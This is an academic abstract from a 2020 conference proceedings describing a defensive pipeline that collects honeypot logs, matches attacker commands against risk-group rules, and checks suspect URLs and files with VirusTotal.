Automated Monitoring and Behavior Analysis for Proactive Security Operations

Automated Monitoring and Behavior Analysis for Proactive Security Operations

연구 분야: Infrastructure

학회: MSIE '20: Proceedings of the 2020 2nd International Conference on Management Science and Industrial Engineering

This research presents a method for discovery of malware trapped in Honeypot bait. The focus is the network intrusion on the Unix or Linux operating system. A process flow is introduced to facilitate collecting, analyzing, and classifying cyberattack patterns. Log management and analytics are performed with the Elastic Stack or formerly known as ELK. The data logs (cowire.log) are periodically collected from Honeypot, then they will be filtered, formatted, and inspected through the execution of shell scripts. To detect suspicious commands, a set of rules containing groups of commands is defined. These commands seem to cause the organization's assets vulnerable or harmful. If a command is found matching the command risk group, the system will analyze for its attack pattern by querying VirusTotal database. VirusTotal is a free Sandboxing service for analyzing suspicious files or URLs online. The API will return analysis reports all the antivirus application engines that have previously scanned the suspicious file or URL. The experimental result in this work reported 86% of URLs or files that belong to the command risk groups are considered as threats. The analytic results would contribute to the organization's security policies and proactive security operations development afterwards.